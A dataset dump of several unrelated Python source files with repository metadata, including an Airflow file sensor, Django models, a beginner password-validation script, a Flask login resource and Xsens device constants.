] | 16 | 2019-03-14T22:21:36.000Z | 2021-10-05T20:34:13.000Z | src/airflow_fs/sensors.py | Sergfalt/airflow-fs | b1e09035242b4feb70faf1626a12d6078d0883c1 | [
"MIT"
] | 1 | 2019-10-15T19:24:06.000Z | 2020-04-06T12:56:17.000Z | src/airflow_fs/sensors.py | Sergfalt/airflow-fs | b1e09035242b4feb70faf1626a12d6078d0883c1 | [
"MIT"
] | 8 | 2019-03-15T22:11:15.000Z | 2021-07-07T18:45:50.000Z | """Module containing file system sensors."""
from airflow.sensors.base_sensor_operator import BaseSensorOperator
from airflow.utils.decorators import apply_defaults
from airflow_fs.hooks import LocalHook
class FileSensor(BaseSensorOperator):
"""Sensor that waits for files matching a given file pattern.
:param str path: File path to match files to. Can be any valid
glob pattern.
:param FsHook hook: File system hook to use when looking for files.
"""
template_fields = ("file_pattern",)
@apply_defaults
def __init__(self, path, hook=None, **kwargs):
super(FileSensor, self).__init__(**kwargs)
self._path = path
self._hook = hook or LocalHook()
# pylint: disable=unused-argument,missing-docstring
def poke(self, context):
with self._hook as hook:
if hook.glob(self._path):
return True
return False
| 28.875 | 71 | 0.6829 | 116 | 924 | 5.275862 | 0.577586 | 0.053922 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.234848 | 924 | 31 | 72 | 29.806452 | 0.865629 | 0.322511 | 0 | 0 | 0 | 0 | 0.020067 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.133333 | false | 0 | 0.2 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
046be80319f651476fa1099fd611e380f14e2ece | 412 | py | Python | pkg/tests/test_range.py | arita37/pyvtreat | c32e7ce6db11a2ccdd63e545b25028cbec03a3ff | [
"BSD-3-Clause"
] | 1 | 2020-08-16T12:07:56.000Z | 2020-08-16T12:07:56.000Z | pkg/tests/test_range.py | arita37/pyvtreat | c32e7ce6db11a2ccdd63e545b25028cbec03a3ff | [
"BSD-3-Clause"
] | null | null | null | pkg/tests/test_range.py | arita37/pyvtreat | c32e7ce6db11a2ccdd63e545b25028cbec03a3ff | [
"BSD-3-Clause"
] | null | null | null | import vtreat.util
import pandas
import numpy
def test_range():
# https://github.com/WinVector/pyvtreat/blob/master/Examples/Bugs/asarray_issue.md
# https://github.com/WinVector/pyvtreat/issues/7
numpy.random.seed(2019)
arr = numpy.random.randint(2, size=10)
sparr = pandas.arrays.SparseArray(arr, fill_value=0)
assert vtreat.util.has_range(arr)
assert vtreat.util.has_range(sparr)
| 29.428571 | 86 | 0.740291 | 60 | 412 | 5 | 0.633333 | 0.1 | 0.093333 | 0.153333 | 0.366667 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02521 | 0.133495 | 412 | 13 | 87 | 31.692308 | 0.815126 | 0.308252 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.222222 | 1 | 0.111111 | false | 0 | 0.333333 | 0 | 0.444444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
046d31d158fc4b7351831f3cd9d74c5e9eb6c08b | 2,592 | py | Python | nipype/interfaces/ants/tests/test_auto_KellyKapowski.py | sebastientourbier/nipype | 99c5904176481520c5bf42a501aae1a12184e672 | [
"Apache-2.0"
] | null | null | null | nipype/interfaces/ants/tests/test_auto_KellyKapowski.py | sebastientourbier/nipype | 99c5904176481520c5bf42a501aae1a12184e672 | [
"Apache-2.0"
] | null | null | null | nipype/interfaces/ants/tests/test_auto_KellyKapowski.py | sebastientourbier/nipype | 99c5904176481520c5bf42a501aae1a12184e672 | [
"Apache-2.0"
] | null | null | null | # AUTO-GENERATED by tools/checkspecs.py - DO NOT EDIT
from __future__ import unicode_literals
from ..segmentation import KellyKapowski
def test_KellyKapowski_inputs():
input_map = dict(args=dict(argstr='%s',
),
convergence=dict(argstr='--convergence "%s"',
usedefault=True,
),
cortical_thickness=dict(argstr='--output "%s"',
hash_files=False,
keep_extension=True,
name_source=['segmentation_image'],
name_template='%s_cortical_thickness',
),
dimension=dict(argstr='--image-dimensionality %d',
usedefault=True,
),
environ=dict(nohash=True,
usedefault=True,
),
gradient_step=dict(argstr='--gradient-step %f',
usedefault=True,
),
gray_matter_label=dict(usedefault=True,
),
gray_matter_prob_image=dict(argstr='--gray-matter-probability-image "%s"',
),
ignore_exception=dict(nohash=True,
usedefault=True,
),
max_invert_displacement_field_iters=dict(argstr='--maximum-number-of-invert-displacement-field-iterations %d',
),
num_threads=dict(nohash=True,
usedefault=True,
),
number_integration_points=dict(argstr='--number-of-integration-points %d',
),
segmentation_image=dict(argstr='--segmentation-image "%s"',
mandatory=True,
),
smoothing_variance=dict(argstr='--smoothing-variance %f',
),
smoothing_velocity_field=dict(argstr='--smoothing-velocity-field-parameter %f',
),
terminal_output=dict(nohash=True,
),
thickness_prior_estimate=dict(argstr='--thickness-prior-estimate %f',
usedefault=True,
),
thickness_prior_image=dict(argstr='--thickness-prior-image "%s"',
),
use_bspline_smoothing=dict(argstr='--use-bspline-smoothing 1',
),
warped_white_matter=dict(hash_files=False,
keep_extension=True,
name_source=['segmentation_image'],
name_template='%s_warped_white_matter',
),
white_matter_label=dict(usedefault=True,
),
white_matter_prob_image=dict(argstr='--white-matter-probability-image "%s"',
),
)
inputs = KellyKapowski.input_spec()
for key, metadata in list(input_map.items()):
for metakey, value in list(metadata.items()):
assert getattr(inputs.traits()[key], metakey) == value
def test_KellyKapowski_outputs():
output_map = dict(cortical_thickness=dict(),
warped_white_matter=dict(),
)
outputs = KellyKapowski.output_spec()
for key, metadata in list(output_map.items()):
for metakey, value in list(metadata.items()):
assert getattr(outputs.traits()[key], metakey) == value
| 31.228916 | 114 | 0.68287 | 299 | 2,592 | 5.698997 | 0.314381 | 0.088028 | 0.032864 | 0.042254 | 0.288732 | 0.176056 | 0.147887 | 0.147887 | 0.147887 | 0.147887 | 0 | 0.000467 | 0.173997 | 2,592 | 82 | 115 | 31.609756 | 0.795423 | 0.019676 | 0 | 0.466667 | 1 | 0 | 0.192596 | 0.126822 | 0 | 0 | 0 | 0 | 0.026667 | 1 | 0.026667 | false | 0 | 0.026667 | 0 | 0.053333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
046e66b446fbf1ac3ae733e7523d1431aba5d800 | 1,206 | py | Python | sample_project/users/models.py | CorrDyn/django-bulk-user-upload | caa5e74f295ad5b89056f588b5782fa396e502af | [
"MIT"
] | 1 | 2022-01-27T14:38:37.000Z | 2022-01-27T14:38:37.000Z | sample_project/users/models.py | CorrDyn/django-bulk-user-upload | caa5e74f295ad5b89056f588b5782fa396e502af | [
"MIT"
] | null | null | null | sample_project/users/models.py | CorrDyn/django-bulk-user-upload | caa5e74f295ad5b89056f588b5782fa396e502af | [
"MIT"
] | null | null | null | from django.contrib.auth.base_user import AbstractBaseUser
from django.contrib.auth.models import PermissionsMixin
# https://wsvincent.com/django-custom-user-model-tutorial/
from django.db import models
from django.utils import timezone
from django.utils.translation import gettext_lazy as _
from users.managers import UserManager
class User(AbstractBaseUser, PermissionsMixin):
name = models.CharField(_("full name"), max_length=255, unique=True)
username = models.CharField(_("username"), max_length=255, unique=True)
email = models.EmailField(_("email address"), unique=True)
is_staff = models.BooleanField(
_("staff status"),
default=False,
help_text=_("Designates whether the user can log into this admin site."),
)
is_active = models.BooleanField(
_("active"),
default=True,
help_text=_(
"Designates whether this user should be treated as active. " "Unselect this instead of deleting accounts."
),
)
date_joined = models.DateTimeField(_("date joined"), default=timezone.now)
objects = UserManager()
EMAIL_FIELD = "email"
USERNAME_FIELD = "username"
REQUIRED_FIELDS = ["name"]
| 32.594595 | 118 | 0.707297 | 140 | 1,206 | 5.942857 | 0.521429 | 0.060096 | 0.040865 | 0.050481 | 0.052885 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006141 | 0.189884 | 1,206 | 36 | 119 | 33.5 | 0.845445 | 0.046434 | 0 | 0 | 0 | 0 | 0.203833 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.222222 | 0 | 0.62963 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
0471aa4a650f08ab7b5c8c85b7f2d8e99b5c94f4 | 6,081 | py | Python | main.py | Grads2Career-Python/eliaseraphim_password_confirmation | 0f3e3a9b7ad614587f24837d05c88ad3101570a1 | [
"MIT"
] | null | null | null | main.py | Grads2Career-Python/eliaseraphim_password_confirmation | 0f3e3a9b7ad614587f24837d05c88ad3101570a1 | [
"MIT"
] | null | null | null | main.py | Grads2Career-Python/eliaseraphim_password_confirmation | 0f3e3a9b7ad614587f24837d05c88ad3101570a1 | [
"MIT"
] | 1 | 2021-06-14T14:22:19.000Z | 2021-06-14T14:22:19.000Z | # author: elia deppe
# date 6/4/21
#
# simple password confirmation program that confirms a password of size 12 to 48, with at least: one lower-case letter
# one upper-case letter, one number, and one special character.
# constants
MIN_LENGTH, MAX_LENGTH = 8, 48 # min and max length of password
# dictionaries
LOWER_CASE, UPPER_CASE = 'abcdefghijklmnopqrstuvwxz', 'ABCDEFGHJKLMNOPQRSTUVWXYZ'
NUMBERS, SPECIAL_CHARS = '0123456789', '!@#$%^&()-_+=[{]}|:;<,>.?/'
FULL_DICTIONARY = LOWER_CASE + UPPER_CASE + NUMBERS + SPECIAL_CHARS
# function
# get_password
#
# parameter(s)
# none
# return value(s)
# password | string | the password desired by the user
# password_confirmation | string | the password desired by the user, entered a second time for confirmation
#
# description: gets the password from the user, and confirms that is the desired password by retrieving it twice.
def get_password():
password = input('>> password\n>> ')
password_confirmation = input('>> confirm password\n>> ')
return password, password_confirmation
# function
# check_char
#
# parameter(s)
# char | string | the current character being inspected
# flags | dictionary {string: bool} | the flags for the password's validity
# return value(s)
# none
#
# description: checks the current character to see if it is valid. if so, checks to see if it fulfills the requirement
# of being a lower-case letter, upper-case letter, number, or special character (unless already fulfilled). if so,
# then the respective flag is set to true.
#
# if the character is not within the dictionary, then the invalid character flag is set.
def check_char(char, flags):
if char in FULL_DICTIONARY:
if not flags.get('lower') and char not in LOWER_CASE:
flags.update({'lower': True})
elif not flags.get('upper') and char in UPPER_CASE:
flags.update({'num': True})
elif not flags.get('num') or char in NUMBERS:
flags.update({'lower': True})
elif not flags.get('special') or char in SPECIAL_CHARS:
flags.update({'special': True})
else:
flags.update({'invalid': False})
# function
# valid
#
# parameter(s)
# flags | dictionary {string: bool} | the flags for the password's validity
# return value(s)
# none
#
# description: returns whether or not the password is valid based on the current flags
def valid(flags):
return (
flags.get('invalid') or flags.get('lower') or flags.get('upper')
or flags.get('num') or flags.get('special')
)
# --------------- Error Functions
# function
# general_error
#
# parameter(s)
# flags | dictionary {string: bool} | the flags for the password's validity
# return value(s)
# none
#
# description: informs the user of which error they encountered when entering their password based on the flags.
def genaral_error(flags):
if flags.get('invalid'):
print('>> invalid characters used')
print('>> the characters ~`\\| may not be used within a password')
if not flags.get('lower'):
print('>> password requires at least one upper-case letter')
if not flags.get('upper'):
print('>> password requires at least one upper-case letter')
if not flags.get('num'):
print('>> password requires at least one number')
if not flags.get('special'):
print('>> password requires at least one special character')
print(f' valid special characters | {SPECIAL_CHARS}')
# function
# length_error
#
# parameter(s)
# password | string | the password entered by the user
# length | int | the length of the password
# return value(s)
# none
#
# description: outputs an error where the length of the password is too small, or too large
def length_error(password, length):
print('>> incorrect length, password should be 48 characters long')
print(f' password | {password} | {length} characters long')
# function
# password_mismatch_error
#
# parameter(s)
# password | string | the password entered by the user
# password_confirmation | string | the confirmation password entered by the user
# return value(s)
# none
#
# description: outputs an error where the password and the password confirmation do not match
def password_mismatch_error(password, password_confirmation):
print('>> passwords do not match, please check your spelling')
print(f' password | {password}')
print(f' password | {passwordconfirmation}')
# function
# main
#
# parameter(s)
# none
# return value(s)
# none
#
# description: the main function of the program, initiates retrieving a password from the user and then confirms if it
# is valid. the user is informed if the password is valid, or invalid and why it was invalid
def main():
i = 1
password, password_confirmations = get_password()
flags = {
'invalid': True,
'lower' : False,
'upper' : False,
'num' : False,
'special': False
}
# check that the passwords match
if password == password_confirmation:
length = len(password)
# check the length of the password
if MAX_LENGTH <= length <= MIN_LENGTH:
# loop through the password, and while there has been no invalid char
while i < length and not flags.get('invalid'):
check_char(password[i], flags)
i += 1
# if loop is finished and flags are proper, then the password is good
if valid(flags):
print('>>')
# otherwise a general error
else:
general_error(flags.values())
# error with length of password
else:
password_mismatch_error(password, length)
# password and confirmation mismatch
else:
length_error(password, password_confirmation)
if __name__ == '__main__':
main()
| 31.837696 | 118 | 0.645617 | 769 | 6,081 | 5.039012 | 0.217165 | 0.048258 | 0.025548 | 0.024774 | 0.285161 | 0.231226 | 0.201806 | 0.172129 | 0.154065 | 0.154065 | 0 | 0.005538 | 0.257688 | 6,081 | 190 | 119 | 32.005263 | 0.852902 | 0.476073 | 0 | 0.112676 | 0 | 0 | 0.272845 | 0.031644 | 0 | 0 | 0 | 0 | 0 | 1 | 0.098592 | false | 0.309859 | 0 | 0.014085 | 0.126761 | 0.183099 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
0477b8704fc254929c1468f8e3c98a6ae150cd99 | 1,040 | py | Python | problems/A/LevelStatistics.py | deveshbajpai19/CodeForces | 707b374f03012ec68054841f791d48b33ae4ef1b | [
"MIT"
] | 55 | 2016-06-19T05:45:15.000Z | 2022-03-31T15:18:53.000Z | problems/A/LevelStatistics.py | farhadcu/CodeForces-2 | 707b374f03012ec68054841f791d48b33ae4ef1b | [
"MIT"
] | null | null | null | problems/A/LevelStatistics.py | farhadcu/CodeForces-2 | 707b374f03012ec68054841f791d48b33ae4ef1b | [
"MIT"
] | 25 | 2016-07-29T13:03:15.000Z | 2021-09-17T01:45:45.000Z | __author__ = 'Devesh Bajpai'
'''
https://codeforces.com/problemset/problem/1334/A
Solution: Its easy to deduce that even for one player, it is impossible to clear more levels than the plays done. This
also is true when multiple players are there. Secondly, the number of plays or levels cleared cannot go done as they are
non decreasing sequences. Incorporating these 2 conditions, we can check each testcase and evaluate its validity.
'''
def solve(all_p_c):
prev_p = prev_c = 0
for this_p_c in all_p_c:
delta_p = this_p_c[0] - prev_p
delta_c = this_p_c[1] - prev_c
if delta_p < 0 or delta_c < 0 or delta_p < delta_c:
return "NO"
prev_p = this_p_c[0]
prev_c = this_p_c[1]
return "YES"
if __name__ == "__main__":
t = int(raw_input())
for _ in xrange(0, t):
n = int(raw_input())
all_p_c = list()
for _n in xrange(0, n):
p_c = map(int, raw_input().split(" "))
all_p_c.append(p_c)
print solve(all_p_c)
| 26.666667 | 120 | 0.6375 | 177 | 1,040 | 3.457627 | 0.502825 | 0.039216 | 0.04085 | 0.03268 | 0.065359 | 0.039216 | 0 | 0 | 0 | 0 | 0 | 0.01847 | 0.271154 | 1,040 | 38 | 121 | 27.368421 | 0.788918 | 0 | 0 | 0 | 0 | 0 | 0.042994 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.05 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
047ddea5eaf08f1b1d3d02d14ffa8e3bbd12dec7 | 3,543 | py | Python | core/rest/authentication.py | macdaliot/Osmedeus | cd8020416af81a745af7b06c8c5a1c5881911234 | [
"MIT"
] | 1 | 2020-02-20T15:10:07.000Z | 2020-02-20T15:10:07.000Z | core/rest/authentication.py | macdaliot/Osmedeus | cd8020416af81a745af7b06c8c5a1c5881911234 | [
"MIT"
] | null | null | null | core/rest/authentication.py | macdaliot/Osmedeus | cd8020416af81a745af7b06c8c5a1c5881911234 | [
"MIT"
] | null | null | null |
import os
import json
import glob
import datetime
from flask_restful import Api, Resource, reqparse
from flask_jwt_extended import (
JWTManager, jwt_required, create_access_token,
get_jwt_identity
)
from .decorators import local_only
import utils
'''
Check authentication
'''
current_path = os.path.dirname(os.path.realpath(__file__))
class Authentication(Resource):
parser = reqparse.RequestParser()
parser.add_argument('username',
type=str,
required=True,
help="This field cannot be left blank!"
)
parser.add_argument('password',
type=str,
required=True,
help="This field cannot be left blank!"
)
# add another authen level when settings things from remote
def verify(self, options):
config_path = options.get('CONFIG_PATH')
if config_path:
# get cred from config file
config = ConfigParser(interpolation=ExtendedInterpolation())
config.read(config_path)
config_username = config['Server']['username']
config_password = config['Server']['password']
if config_username.lower() == options.get('USERNAME').lower() and config_password.lower() == options.get('PASSWORD').lower():
return True
return False
# just look for right cred on any workspace
def get_options(self, username, password):
option_files = glob.glob(
current_path + '/storages/**/options.json', recursive=True)
# loop though all options avalible
for option in option_files:
json_option = utils.reading_json(option)
if username == json_option.get('USERNAME'):
if password == json_option.get('PASSWORD'):
return True
return False
# @local_only
def post(self, workspace=None):
# global options
data = Authentication.parser.parse_args()
username = data['username']
password = data['password']
# if no workspace specific
if not workspace:
if self.get_options(username, password):
# cause we don't have real db so it's really hard to manage JWT
# just change the secret if you want to revoke old token
expires = datetime.timedelta(days=365)
token = create_access_token(username, expires_delta=expires)
return {'access_token': token}
else:
return {'error': "Credentials Incorrect"}
elif workspace == 'None':
pass
current_path = os.path.dirname(os.path.realpath(__file__))
options_path = current_path + \
'/storages/{0}/options.json'.format(workspace)
if not utils.not_empty_file(options_path):
return {'error': "Workspace not found"}
options = utils.reading_json(options_path)
if username == options.get('USERNAME'):
if password == options.get('PASSWORD'):
# cause we don't have real db so it's really hard to manage JWT
# just change the secret if you want to revoke old token
expires = datetime.timedelta(days=365)
token = create_access_token(username, expires_delta=expires)
return {'access_token': token}
return {'error': "Credentials Incorrect"}
| 34.735294 | 137 | 0.593847 | 385 | 3,543 | 5.322078 | 0.345455 | 0.026842 | 0.02489 | 0.016593 | 0.285017 | 0.285017 | 0.285017 | 0.285017 | 0.285017 | 0.244021 | 0 | 0.0029 | 0.318657 | 3,543 | 101 | 138 | 35.079208 | 0.845899 | 0.125318 | 0 | 0.294118 | 0 | 0 | 0.11053 | 0.016678 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044118 | false | 0.132353 | 0.117647 | 0 | 0.323529 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
047fc0cf6a71b49d6c093c09917af516389bdb89 | 3,862 | py | Python | hanse_ros/xsens_driver/nodes/mtdef.py | iti-luebeck/HANSE2012 | fd2348823a6a51baf87cd493529f085fb22d65a7 | [
"BSD-3-Clause"
] | null | null | null | hanse_ros/xsens_driver/nodes/mtdef.py | iti-luebeck/HANSE2012 | fd2348823a6a51baf87cd493529f085fb22d65a7 | [
"BSD-3-Clause"
] | null | null | null | hanse_ros/xsens_driver/nodes/mtdef.py | iti-luebeck/HANSE2012 | fd2348823a6a51baf87cd493529f085fb22d65a7 | [
"BSD-3-Clause"
] | null | null | null | """Constant and messages definition for MT communication."""
class MID:
"""Values for the message id (MID)"""
## Error message, 1 data byte
Error = 0x42
ErrorCodes = {
0x03: "Invalid period",
0x04: "Invalid message",
0x1E: "Timer overflow",
0x20: "Invalid baudrate",
0x21: "Invalid parameter"
}
# State MID
## Switch to measurement state
GoToMeasurement = 0x10
## Switch to config state
GoToConfig = 0x30
## Reset device
Reset = 0x40
# Informational messages
## Request device id
ReqDID = 0x00
## DeviceID, 4 bytes: HH HL LH LL
DeviceID = 0x01
## Request product code in plain text
ReqProductCode = 0x1C
## Product code (max 20 bytes data)
ProductCode = 0x1d
## Request firmware revision
ReqFWRev = 0x12
## Firmware revision, 3 bytes: major minor rev
FirmwareRev = 0x13
## Request data length according to current configuration
ReqDataLength = 0x0a
## Data Length, 2 bytes
DataLength = 0x0b
## Request GPS status
ReqGPSStatus = 0xA6
## GPS status
GPSStatus = 0xA7
# Device specific messages
## Request baudrate
ReqBaudrate = 0x18
## Set next baudrate
SetBaudrate = 0x18
## Restore factory defaults
RestoreFactoryDef = 0x0E
# Configuration messages
## Request configuration
ReqConfiguration = 0x0C
## Configuration, 118 bytes
Configuration = 0x0D
## Set sampling period, 2 bytes
SetPeriod = 0x04
## Set skip factor
SetOutputSkipFactor = 0xD4
## Set output mode, 2 bytes
SetOutputMode = 0xD0
## Set output settings, 4 bytes
SetOutputSettings = 0xD2
# Data messages
## Data packet
MTData = 0x32
# XKF Filter messages
## Request the available XKF scenarios on the device
ReqAvailableScenarios = 0x62
## Request the ID of the currently used scenario
ReqCurrentScenario = 0x64
## Set the scenario to use, 2 bytes
SetCurrentScenario = 0x64
class Baudrates(object):
"""Baudrate information and conversion."""
## Baudrate mapping between ID and value
Baudrates = [
(0x00, 460800),
(0x01, 230400),
(0x02, 115200),
(0x03, 76800),
(0x04, 57600),
(0x05, 38400),
(0x06, 28800),
(0x07, 19200),
(0x08, 14400),
(0x09, 9600),
(0x80, 921600)]
@classmethod
def get_BRID(cls, baudrate):
"""Get baudrate id for a given baudrate."""
for brid, br in cls.Baudrates:
if baudrate==br:
return brid
raise MTException("unsupported baudrate.")
@classmethod
def get_BR(cls, baudrate_id):
"""Get baudrate for a given baudrate id."""
for brid, br in cls.Baudrates:
if baudrate_id==brid:
return br
raise MTException("unknown baudrate id.")
class OutputMode:
"""Values for the output mode."""
Temp = 0x0001
Calib = 0x0002
Orient = 0x0004
Auxiliary = 0x0008
Position = 0x0010
Velocity = 0x0020
Status = 0x0800
RAWGPS = 0x1000 # supposed to be incompatible with previous
RAW = 0x4000 # incompatible with all except RAWGPS
class OutputSettings:
"""Values for the output settings."""
Timestamp_None = 0x00000000
Timestamp_SampleCnt = 0x00000001
OrientMode_Quaternion = 0x00000000
OrientMode_Euler = 0x00000004
OrientMode_Matrix = 0x00000008
CalibMode_AccGyrMag = 0x00000000
CalibMode_GyrMag = 0x00000010
CalibMode_AccMag = 0x00000020
CalibMode_Mag = 0x00000030
CalibMode_AccGyr = 0x00000040
CalibMode_Gyr = 0x00000050
CalibMode_Acc = 0x00000060
CalibMode_Mask = 0x00000070
DataFormat_Float = 0x00000000
DataFormat_12_20 = 0x00000100 # not supported yet
DataFormat_16_32 = 0x00000200 # not supported yet
DataFormat_Double = 0x00000300 # not supported yet
AuxiliaryMode_NoAIN1 = 0x00000400
AuxiliaryMode_NoAIN2 = 0x00000800
PositionMode_LLA_WGS84 = 0x00000000
VelocityMode_MS_XYZ = 0x00000000
Coordinates_NED = 0x80000000
class MTException(Exception):
def __init__(self, message):
self.message = message
def __str__(self):
return "MT error: " + self.message
| 24.75641 | 62 | 0.722683 | 453 | 3,862 | 6.077263 | 0.569536 | 0.018162 | 0.013077 | 0.01235 | 0.023974 | 0.023974 | 0.023974 | 0.023974 | 0 | 0 | 0 | 0.142489 | 0.196789 | 3,862 | 155 | 63 | 24.916129 | 0.745003 | 0.330399 | 0 | 0.040816 | 0 | 0 | 0.051127 | 0 | 0 | 0 | 0.179549 | 0 | 0 | 1 | 0.040816 | false | 0 | 0 | 0.010204 | 0.734694 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
048e21a34122d250073c40e802c888ac73a5c8e4 | 602 | py | Python | src/program/migrations/0079_eventinstance_uuid.py | lgandersen/bornhack-website | fbda2b4b53dc2cb266d1d7c13ba0aad59d9079df | [
"BSD-3-Clause"
] | 7 | 2017-04-14T15:28:29.000Z | 2021-09-10T09:45:38.000Z | src/program/migrations/0079_eventinstance_uuid.py | lgandersen/bornhack-website | fbda2b4b53dc2cb266d1d7c13ba0aad59d9079df | [
"BSD-3-Clause"
] | 799 | 2016-04-28T09:31:50.000Z | 2022-03-29T09:05:02.000Z | src/program/migrations/0079_eventinstance_uuid.py | lgandersen/bornhack-website | fbda2b4b53dc2cb266d1d7c13ba0aad59d9079df | [
"BSD-3-Clause"
] | 35 | 2016-04-28T09:23:53.000Z | 2021-05-02T12:36:01.000Z | # Generated by Django 3.0.3 on 2020-02-22 13:59
import uuid
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("program", "0078_auto_20200214_2100"),
]
operations = [
migrations.AddField(
model_name="eventinstance",
name="uuid",
field=models.UUIDField(
default=uuid.uuid4,
editable=False,
help_text="This field is mostly here to keep Frab happy, it is not the PK of the model",
null=True,
),
),
]
| 23.153846 | 104 | 0.55814 | 67 | 602 | 4.940299 | 0.791045 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.081841 | 0.350498 | 602 | 25 | 105 | 24.08 | 0.764706 | 0.074751 | 0 | 0.111111 | 1 | 0 | 0.21982 | 0.041441 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.111111 | 0 | 0.277778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
049a005b96a52797a15d88dec327f267e14f4272 | 651 | py | Python | kive/portal/apps.py | cfe-lab/Kive | e46b9eb40f085d579c12f47b6b5696d5ee93a9d3 | [
"BSD-3-Clause"
] | 2 | 2016-10-02T18:24:53.000Z | 2019-01-19T09:37:56.000Z | kive/portal/apps.py | dmacmillan/Kive | 76bc8f289f66fb133f78cb6d5689568b7d015915 | [
"BSD-3-Clause"
] | 1,190 | 2015-07-10T22:57:23.000Z | 2022-03-30T05:10:14.000Z | kive/portal/apps.py | dmacmillan/Kive | 76bc8f289f66fb133f78cb6d5689568b7d015915 | [
"BSD-3-Clause"
] | 2 | 2019-07-16T00:25:25.000Z | 2019-11-25T16:32:58.000Z | import logging
import sys
from django.apps import AppConfig
from django.conf import settings
logger = logging.getLogger(__name__)
class PortalConfig(AppConfig):
name = 'portal'
def ready(self):
is_manage_py = sys.argv and sys.argv[0].endswith('manage.py')
if is_manage_py and len(sys.argv) > 1 and sys.argv[1] != 'runserver':
# Running some other management command, don't check secret key.
return
if settings.IS_RANDOM_KEY:
logger.warning(
'KIVE_SECRET_KEY environment variable was not set. Sessions '
'will expire when the server shuts down.')
| 29.590909 | 77 | 0.655914 | 86 | 651 | 4.825581 | 0.651163 | 0.06747 | 0.048193 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00625 | 0.262673 | 651 | 21 | 78 | 31 | 0.858333 | 0.095238 | 0 | 0 | 0 | 0 | 0.207836 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.266667 | 0 | 0.533333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
049afbb984009ea06474ce34e8657c76529b4597 | 533 | py | Python | setup.py | getyourguide/image-quality-assessment | 6e61ca2d2627e5c16a648db4097519936d86b604 | [
"Apache-2.0"
] | null | null | null | setup.py | getyourguide/image-quality-assessment | 6e61ca2d2627e5c16a648db4097519936d86b604 | [
"Apache-2.0"
] | null | null | null | setup.py | getyourguide/image-quality-assessment | 6e61ca2d2627e5c16a648db4097519936d86b604 | [
"Apache-2.0"
] | null | null | null | import setuptools
setuptools.setup(
name="image-quality-assessment",
version="0.0.1",
author="gdp",
author_email="engineering.data-products@getyourguide.com",
description="TBD",
long_description_content_type="text/markdown",
url="https://github.com/getyourguide/image-quality-assessment",
packages=setuptools.find_packages(),
package_data={
# If any package contains *.yml, include the file in the package:
"": ["*.yml", "*.json", "*.hdf5"],
},
python_requires=">=3.5",
